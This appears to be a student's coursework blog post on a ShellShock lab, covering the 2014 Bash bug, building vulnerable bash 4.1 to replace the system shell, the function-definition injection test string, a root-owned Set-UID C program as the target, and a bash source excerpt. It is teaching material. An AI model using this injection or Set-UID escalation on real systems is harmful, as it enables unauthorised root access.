2019-2020-1 20199305《Linux内核原理与分析》第十一周作业

ShellShock 攻击实验

(一)何为ShellShock?

2014年9月24日,Bash中发现了一个严重漏洞shellshock,该漏洞可用于许多系统,并且既可以远程也可以在本地触发,这项漏洞的威胁程度之所以堪比“心脏流血”,一定程度上是因为Shellshock所影响的Bash软件,同样被广泛应用与各类网络服务器以及其他电脑设备。要是用一句话概括这个漏洞,就是代码和数据没有正确区分。

(二)实验准备

(1)环境搭建

 sudo su
 wget http://labfile.oss.aliyuncs.com/bash-4.1.tar.gz


(2)安装

 tar xf bash-4.1.tar.gz
 cd bash-4.1
 ./configure
 make && make install

(3)链接

rm /bin/bash
ln -s /usr/local/bin/bash /bin/bash

(4)漏洞检查

exit
env x='() { :; }; echo vulnerable' bash -c "echo this is a test "

(三)实验过程

(1)本实验中,我们通过攻击Set-UID程序来获得root权限。 首先,确保安装了带有漏洞的bash版本,并让/bin/sh 指向/bin/bash,然后在 /home/shiyanlou 目录下新建一个 shock.c 文件。

 sudo ln -sf /bin/bash /bin/sh
 vi shock.c


输入如下内容:

#include <stdio.h>
void main()
{
    setuid(geteuid()); // make real uid = effective uid.
    system("/bin/ls -l");
}

(2)编译这段代码,并设置其为Set-UID程序,保证它的所有者是root

sudo su
gcc -o shock shock.c
chmod u+s shock
ls -il shock

这里使用了setuid(geteuid()) 来使real uid = effective uid,这在Set-UID程序中不是普遍现象,但它确实有时会发生。

如果 setuid(geteuid()) 语句被去掉了,再试试看攻击


失败了!这就说明如果 real uid 和 effective uid 相同的话,定义在环境变量中的内容在该程序内有效,那样shellshock漏洞就能够被利用了。但是如果两个 uid 不同的话,环境变量失效,就无法发动攻击了

(3)这里给出部分代码


void initialize_shell_variables(){
// 循环遍历所有环境变量
for (string_index = 0; string = env[string_index++]; ) {
     /*...*/
     /* 如果有export过的函数, 在这里定义 */
     /* 无法导入在特权模式下(root下)定义的函数 */
     if (privmode == 0 && read_but_dont_execute == 0 &&
           STREQN (“() {“, string, 4)) {
           [...]
           // 这里是shellshock发生的地方
           // 传递函数定义 + 运行额外的指令
           parse_and_execute (temp_string, name, SEVAL_NONINT|SEVAL_NOHIST);
           [...]
} 
}
posted @ 2019-11-30 11:16  20199305易子晗  阅读(204)  评论(0编辑  收藏  举报